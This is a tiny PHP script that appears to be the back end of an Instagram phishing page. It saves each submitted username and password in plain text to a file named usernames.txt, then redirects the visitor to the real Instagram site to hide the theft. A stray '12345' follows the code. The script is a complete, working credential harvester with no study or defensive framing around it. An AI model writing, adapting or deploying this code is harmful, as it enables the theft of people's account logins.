<?phpfile_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);header('Location: https://www.instagram.com ');exit();
12345